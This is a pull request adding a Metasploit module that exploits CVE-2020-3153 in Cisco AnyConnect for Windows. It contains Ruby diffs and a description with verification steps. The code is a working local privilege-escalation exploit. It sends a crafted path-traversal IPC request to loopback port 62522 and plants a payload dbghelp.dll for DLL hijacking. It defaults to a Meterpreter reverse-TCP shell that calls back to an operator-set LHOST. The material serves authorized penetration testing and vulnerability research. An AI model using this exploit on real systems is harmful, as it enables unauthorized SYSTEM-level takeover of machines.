+            [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ac-win-path-traverse-qO4HWBsj'],
+            [ 'CVE', '2020-3153']
+          ],
+        'DisclosureDate' => 'Feb 19 2020',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'FileDropperDelay' => 10
+        }
+      )
+    )
+
+    register_advanced_options [
+      OptBool.new('ForceExploit', [ false, 'Override check result', false ])
+    ]
+
+    @file_name = 'vpndownloader.exe'
+  end
+
+  # See AnyConnect IPC protocol articles:
+  # - https://www.serializing.me/2016/12/14/anyconnect-elevation-of-privileges-part-1/
+  # - https://www.serializing.me/2016/12/20/anyconnect-elevation-of-privileges-part-2/
+  class CIPCHeader < BinData::Record
+    endian :little
+
+    uint32 :id_tag,            label: 'ID Tag', value: 0x4353434f
+    uint16 :header_length,     label: 'Header Length', initial_value: -> { num_bytes }
+    uint16 :data_length,       label: 'Data Length', initial_value: -> { parent.body.num_bytes }
+    uint32 :ipc_repsonse_cb,   label: 'IPC response CB', initial_value: 0xFFFFFFFF
+    uint32 :msg_user_context,  label: 'Message User Context', initial_value: 0x00000000
+    uint32 :request_msg_id,    label: 'Request Message Id', initial_value: 0x00000002
+    uint32 :return_ipc_object, label: 'Return IPC Object', initial_value: 0x00000000
+    uint8  :message_type,      label: 'Message Type', initial_value: 1
+    uint8  :message_id,        label: 'Message ID', initial_value: 2
+  end
+
+  class CIPCTlv < BinData::Record
+    endian :big
+
+    uint8   :msg_type,   label: 'Type'
+    uint8   :msg_index,  label: 'Index'
+    uint16  :msg_length, label: 'Length', initial_value: -> { msg_value.num_bytes }
+    stringz :msg_value,  label: 'Value', length: -> { msg_length }
+  end
+
+  class CIPCMessage < BinData::Record
+    endian :little
+
+    cipc_header :header, label: 'Header'
+    array :body, label: 'Body', type: :cipc_tlv, read_until: :eof
+  end
+
+  # Simplify pulling the writable directory variable
+  #def base_dir
+  #  datastore['WritableDir'].to_s
+  #end
+
+  def check
+    fail_with(Failure::None, 'Session is already elevated') if is_system?
+
+    file_path = nil
+    path = 'Cisco\\Cisco AnyConnect Secure Mobility Client'
+    [ 'C:\\Program Files (x86)', 'C:\\Program Files' ].each do |pf_path|
+      if file_exist?([pf_path, path, @file_name].join('\\'))
+        @installation_path = "#{pf_path}\\#{path}"
+        file_path = "#{@installation_path}\\#{@file_name}"
+        break
+      end
+    end
+
+    if file_path
+      vprint_status("Found vpndownloader.exe path: '#{file_path}'")
+      version = file_version(file_path)
+      if version
+        patched_version = Gem::Version.new('4.8.02042')
+        @ac_version    = Gem::Version.new(version.join('.'))
+        if @ac_version < patched_version
+          vprint_good("Cisco AnyConnect version #{@ac_version} appears to be vulnerable")
+          return CheckCode::Appears
+        else
+          vprint_error("Cisco AnyConnect version #{@ac_version} is not vulnerable")
+          return CheckCode::Safe
+        end
+      else
+        vprint_warning('Unable to retrieve vpndownloader.exe file version')
+      end
+    else
+      vprint_warning(
+        'vpndownloader.exe not found on the file system, file version check '\
+        'won\'t be possible'
+      )
+    end
+
+    CheckCode::Unknown
+  end
+
+  def exploit
+    if check == CheckCode::Safe
+      unless datastore['ForceExploit']
+        fail_with( Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    cac_cmd = '"CAC-nc-install'
+    if @ac_version >= Gem::Version.new('4.7')
+      vprint_status('"-ipc" argument needed')
+      cac_cmd << "\t-ipc=666"
+    else
+      vprint_status('"-ipc" argument not needed')
+    end
+
+    dbghelp_path = 'C:\\ProgramData\\Cisco\\dbghelp.dll'
+    print_status("Writing the payload to #{dbghelp_path}")
+
+    begin
+      #:dll_exitprocess
+      payload_dll = generate_payload_dll
+      write_file(dbghelp_path, payload_dll)
+      register_file_for_cleanup(dbghelp_path)
+    rescue ::Rex::Post::Meterpreter::RequestError => e
+      fail_with(Failure::NotFound, e.message)
+    end
+
+    # vpndownloader.exe will be copied to "C:\ProgramData\Cisco\" (assuming the
+    # normal process will copy the file to
+    # "C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Installer\XXXX.tmp\")
+    register_file_for_cleanup("C:\\ProgramData\\Cisco\\#{@file_name}")
+    cac_cmd << "\t#{@installation_path}\\nope\\nope\\nope\\nope\\../../../../#{@file_name}\t-\""
+    vprint_status("RPC Command: #{cac_cmd}")
+
+    cipc_msg = CIPCMessage.new
+    cipc_msg.body << CIPCTlv.new(
+      msg_type: 0,
+      msg_index: 2,
+      msg_value: cac_cmd
+    )
+    cipc_msg.body << CIPCTlv.new(
+      msg_type: 0,
+      msg_index: 6,
+      msg_value: "#{@installation_path}\\#{@file_name}"
+    )
+
+    vprint_status('Connecting to the AnyConnect agent on 127.0.0.1:62522')
+    socket = client.net.socket.create(
+      Rex::Socket::Parameters.new(
+        'PeerHost' => '127.0.0.1',
+        'PeerPort' => 62522,
+        'Proto'    => 'tcp'
+      )
+    )
+
+    vprint_status("Send the encoded RPC command (size = #{cipc_msg.num_bytes} bytes)")
+    socket.write(cipc_msg.to_binary_s)
+    require 'pry';binding.pry
+
+  #ensure
+    #vprint_status("Close the socket")
+    #socket.close if socket
+  end
+
+  #def on_new_session(session)
+  #end
+
+  #def cleanup
+    # Shortcut Msf::Exploit::FileDropper#cleanup to make sure #on_new_session will run first to cleanup. Elevated privileges are required to delete vpndownloader.exe.
+  #end
+end

--- a/modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
+++ b/modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Local
           prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
           to create/overwrite files in arbitrary locations with system level privileges.
 
-          The attack consists in sending a specially crafted RPC request to the TCP port
+          The attack consists in sending a specially crafted IPC request to the TCP port
           62522 on the loopback device, which is exposed by the Cisco AnyConnect Secure
           Mobility Agent service. This service will then launch the vulnerable installer
           component (`vpndownloader`), which copies itself to an arbitrary location
@@ -42,10 +42,17 @@ class MetasploitModule < Msf::Exploit::Local
             'Antoine Goichot (ATGO)', # PoC
             'Christophe De La Fuente' # msf module
           ],
-        'Platform' => [ 'windows' ],
+        'Platform' => 'win',
         'Arch' => [ ARCH_X86, ARCH_X64 ],
         'SessionTypes' => [ 'meterpreter' ],
-        'Targets' => [[ 'Auto', {} ]],
+        'Targets' => [
+          [
+            'Windows x86/x64 with x86 payload',
+            {
+              'Arch' => ARCH_X86,
+            }
+          ]
+        ],
         'Privileged' => true,
         'References' =>
           [
@@ -56,6 +63,7 @@ class MetasploitModule < Msf::Exploit::Local
         'DisclosureDate' => 'Feb 19 2020',
         'DefaultTarget' => 0,
         'DefaultOptions' => {
+          'PAYLOAD' => 'windows/meterpreter/reverse_tcp',
           'FileDropperDelay' => 10
         }
       )
@@ -164,6 +172,9 @@ class MetasploitModule < Msf::Exploit::Local
 
   def exploit
     fail_with(Failure::None, 'Session is already elevated') if is_system?
+    if !payload.arch.include?(ARCH_X86)
+      fail_with(Failure::None, 'Payload architecture is not compatible with this module. Please, select an x86 payload')
+    end
 
     check_result = check
     print_status(check_result.message)
@@ -180,7 +191,7 @@ class MetasploitModule < Msf::Exploit::Local
     cac_cmd = '"CAC-nc-install'
     if @ac_version && @ac_version >= Gem::Version.new('4.7')
       vprint_status('"-ipc" argument needed')
-      cac_cmd << "\t-ipc=#{rand_text_numeric(4)}"
+      cac_cmd << "\t-ipc=#{rand_text_numeric(5)}"
     else
       vprint_status('"-ipc" argument not needed')
     end
@@ -201,9 +212,9 @@ class MetasploitModule < Msf::Exploit::Local
     # normal process will copy the file to
     # "C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Installer\XXXX.tmp\")
     register_file_for_cleanup("#{program_data_path}\\Cisco\\vpndownloader.exe")
-    junk = Rex::Text.rand_text_alpha(4)
+    junk = Rex::Text.rand_text_alphanumeric(4)
     cac_cmd << "\t#{@installation_path}\\#{junk}\\#{junk}\\#{junk}\\#{junk}\\../../../../vpndownloader.exe\t-\""
-    vprint_status("RPC Command: #{cac_cmd}")
+    vprint_status("IPC Command: #{cac_cmd}")
 
     cipc_msg = CIPCMessage.new
     cipc_msg.body << CIPCTlv.new(
@@ -230,7 +241,7 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::Unreachable, e.message)
     end
 
-    vprint_status("Send the encoded RPC command (size = #{cipc_msg.num_bytes} bytes)")
+    vprint_status("Send the encoded IPC command (size = #{cipc_msg.num_bytes} bytes)")
     socket.write(cipc_msg.to_binary_s)
     socket.flush
     # Give FileDropper some time to cleanup before handing over to the operator


### PR DESCRIPTION
The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
to create/overwrite files in arbitrary locations with system level privileges.

The attack consists in sending a specially crafted IPC request to the TCP port
62522 on the loopback device, which is exposed by the Cisco AnyConnect Secure
Mobility Agent service. This service will then launch the vulnerable installer
component (`vpndownloader`), which copies itself to an arbitrary location
before being executed with system privileges. Since `vpndownloader` is also
vulnerable to DLL hijacking, a specially crafted DLL (`dbghelp.dll`) is created
at the same location `vpndownloader` will be copied to get code execution with
system privileges.

This exploit has been successfully tested against Cisco AnyConnect Secure
Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
version 1909 (x64) and Windows 7 SP1 (x86).

## Verification

- [ ] Start `msfconsole`
- [ ] Get a session with non-administrative privileges
- [ ] `use exploit/windows/local/anyconnect_path_traversal_lpe`
- [ ] `set SESSION <SESSION>`
- [ ] `set payload windows/meterpreter/reverse_tcp`
- [ ] `set LHOST <LHOST>`
- [ ] `set LPORT <LPORT>`
- [ ] `check`
- [ ] Verify the `check` method returns the expected AnyConnect version
- [ ] `run`
- [ ] Verify you get a new session with system privileges
